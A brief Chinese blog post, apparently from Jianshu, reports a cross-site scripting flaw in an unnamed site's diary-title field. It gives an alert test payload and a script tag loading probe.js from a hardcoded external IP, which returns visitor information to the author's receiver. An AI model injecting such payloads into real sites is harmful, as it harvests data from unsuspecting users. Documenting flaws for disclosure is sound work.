某网站写日记的标题处存在XSS
在标题处插入XSS代码:<script>alert(1)</script>
1.png
点击预览,即可看到弹窗:
2.png
在标题处引入远程js文件:<script src="http://123.206.93.11/probe.js"></script>
由于标题字数限制,script标签不能完整闭合,但并不影响获取信息:
3.png
点击预览,在接收端可以看到返回信息:
4.png
某网站写日记的标题处存在XSS
最后编辑于 :
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
推荐阅读更多精彩内容
- 跨站脚本(XSS)是web应用中的一种典型的计算机安全漏洞。XSS允许攻击者可以在其他用户浏览的web页面中注入客...
- 由于公司业务需要多次预加载(3次以上),所以就去查了一些资料,最后还是问了别人才知道了如何多次预加载,下面展示下 ...
